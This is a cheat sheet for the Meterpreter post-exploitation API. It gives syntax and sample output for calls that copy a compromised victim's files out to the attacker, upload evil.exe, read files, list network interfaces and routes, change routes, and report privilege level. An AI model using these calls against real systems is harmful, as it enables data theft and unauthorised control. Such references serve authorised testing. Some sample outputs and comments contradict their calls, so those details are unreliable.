Meterpreter API cheat sheet

This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer.

Rather than checking the code of existing meterpreter scripts and searching for the relevant method, this page is meant to be a one-stop shop.

Hope this will help newbies and enthusiasts like me who want to start writing their own meterpreter scripts.

P.S.: Not all the methods are covered, as this is all I can do in 3 hours. More to update soon :)

Get all the files/folders in a directory

Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of c drive.

Get all the files/folders in a directory along with extra information

Syntax: client.fs.dir.entries_with_info
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of c drive.

Change the directory

Syntax: client.fs.dir.chdir("c:\\")
Output: 0
Comment: This will change the present working directory to c drive.

Make directory

Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" in c drive.

Get current working directory

Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name


Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name

Delete a directory

Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.

Download contents of a target directory

Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the files inside the oldman directory of the victim and save them inside the oldmanlab directory of the attacker's system.

Upload contents of a local directory to the victim's system

Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside the oldmanlab directory of the attacker's system to the oldman directory of the victim's system.

Get the file separator

Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for Windows, / for Unix).

Search for the specified file

Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories

Get the basename for the specified file

Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.

Expand path of the directory

Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will expand the specified environment variable (here %TEMP%) to its absolute path.

Get the md5 of file

Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file

Get the sha1 of file

Syntax: client.fs.file.sha1("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file
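
Both digest methods return the raw digest bytes (16 for MD5, 20 for SHA-1), not a hex string, as the two Output lines above show. The Ruby snippet below is an added example, not code from the original page or from Metasploit: it hex-encodes those two outputs so they can be compared with hex hashes, and checks a retrieved copy of a file against the reported digest. The helper names digest_hex and local_copy_matches? are hypothetical.

```ruby
require "digest"

# Raw digest strings copied from the two Output lines on this page.
MD5_RAW  = "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'".b
SHA1_RAW = "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw".b

# Expected raw digest length per algorithm, in bytes.
DIGEST_BYTES   = { md5: 16, sha1: 20 }.freeze
DIGEST_CLASSES = { md5: Digest::MD5, sha1: Digest::SHA1 }.freeze

# Hex-encode a raw digest (hypothetical helper). A wrong length usually
# means the value was truncated or the wrong method was called, so it is
# rejected instead of being silently encoded.
def digest_hex(raw, algo)
  expected = DIGEST_BYTES.fetch(algo)
  unless raw.bytesize == expected
    raise ArgumentError, "#{algo} digest must be #{expected} bytes, got #{raw.bytesize}"
  end
  raw.unpack1("H*")
end

# Compare the raw digest reported for the remote file with the digest of
# the local copy (hypothetical helper). Both sides are raw bytes, so no
# hex conversion is involved in the comparison.
def local_copy_matches?(raw_remote, local_path, algo)
  DIGEST_CLASSES.fetch(algo).file(local_path).digest == raw_remote.b
end

if __FILE__ == $PROGRAM_NAME
  puts digest_hex(MD5_RAW, :md5)
  puts digest_hex(SHA1_RAW, :sha1)
end
```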

Check if specified file exists

Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false

Delete specified file

Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will delete the specified file.

Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will delete the specified file.

Upload file to the victim's system

Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from the attacker's system to the victim's oldman directory

Download file from the victim's system

Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from the victim's system and save it to the attacker's root directory

Open a file in read mode and copy the content to some variable

Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
              temp = ""
              # read until end of file, appending each chunk to temp
              until file1.eof?
                temp << file1.read
              end
              file1.close
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in the temp variable

List all the available interfaces on the victim's system

Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of all the interfaces available in the victim's system along with details like IP, netmask, mac_address etc.

Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return the first interface available in the victim's system along with details like IP, netmask, mac_address etc.

Get the IP address of specified interface

Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.

List all the routes available in the victim's system

Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available in the victim's system along with details like subnet, netmask, gateway

Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return the first route available in the victim's system along with details like subnet, netmask, gateway

Add a route in the victim's system

Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add a route in the victim's system. The first parameter is subnet, second is netmask and third is gateway.

Remove specified route from the victim's system

Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove the route from the victim's system. The first parameter is subnet, second is netmask and third is gateway.

Get the user id

Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.

Get the victim's computer name

Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.

Get the victim's operating system name and version

Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the name of the operating system running on the compromised system.

Get the victim's operating system architecture

Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86, 64-bit) of the operating system running on the compromised system.

Get the victim's operating system language

Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give the operating system language of the compromised system.

Revert to previous user privileges

Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: If we had changed privileges from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM", revert_to_self will change our privileges back to "NT AUTHORITY\\oldmanlab".